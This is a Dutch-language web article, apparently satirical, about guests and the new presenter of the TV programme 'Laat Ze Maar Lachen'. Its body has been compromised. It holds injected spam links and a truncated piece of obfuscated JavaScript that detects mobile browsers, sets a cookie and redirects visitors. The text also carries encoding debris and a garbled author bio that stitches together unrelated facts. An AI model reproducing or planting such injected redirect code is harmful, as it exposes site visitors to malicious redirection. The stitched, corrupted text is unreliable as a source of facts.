Als Highbrow en Lowbrow hetzelfde waren

zmrgstnHILVERSUM – Lucille Werner, weerman Gerrit Hiemstra, Toine van Peperstraten, zanger Jannes en Nicolette van Dam zijn dit seizoen te gast in Laat Ze Maar Lachen. Robert ten Brink neemt de presentatie van deze editie van het monumentale programma op zich.

In Laat Ze Maar Lachen wordt bekende Nederlanders gevraagd om hun favoriete tv-fragmenten te laten zien en te voorzien van commentaar. Eindredacteur Sandra Mook vertelt: “We vragen niet zomaar iedereen. De gasten moeten wat te vertellen hebben en sprekende fragmenten willen tonen. Er gaat dan ook een paar maanden zitten in de selectie van de BN’ers die uiteindelijk in het programma komen te zitten. En ja, er vallen ook wel eens mensen af.”

Voorafgaand aan de nieuwe serie LZML worden alle gasten uitgebreid geportretteerd in het Volkskrant Magazine en de Vara Gids. Is dat niet een beetje veel ophef rond een programma waarin een paar fragmenten worden getoond?Ai??Mook: “Laat Ze Maar Lachen http://cefoinrivas.es/?p=8605 is bij de Hollandse televisiecultuur gaan horen. De dag na de uitzending heeft iedereen het erover. Was het een goede aflevering? Hoe deed de presentator het?”

Over die presentatie heeft iedereen altijd wel een mening, zo lijkt het. Wie herinnert zich niet de aflevering waarin voormalig http://www.hobagep.hu/hirek/paper-writing-service/ LZML presentator Ron Brandsteder Postcodeloterijheld Gaston Starreveld ontving? Alle recensenten waren het indertijd met elkaar eens: er was geen chemie tussen de twee en Brandsteder verzuimde om door te vragen op cruciale momenten. Zelfs de broer van Starreveld bemoeide zich ermee en sprak in De Telegraaf van een ‘gemiste kans’.

Ten Brink, die nu dus het stokje overneemt, is niet bang voor de kritiek: “”Die gaat er toch komen. Dat weet je als je Laat Ze Maar Lachen gaat presenteren, iedereen heeft er een mening over en je doet het nooit goed.”

Zondag opent Lingo-presentatrice Werner de reeks met een avond die in hetAi??teken zal staan van mode en schoonheid. |vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Bekendheid kreeg hij met de presentatie van de AVRO's Wie-kent-kwis met de zogenaamde marmotten-race, waarbij het echter om cavia's ging. Hij werd verkozen tijdens het Conclaaf van april 2005 en is auteur van onder meer het boek: "Standing Firm: A Vice-Presidential Memoir".

Laat een bericht achter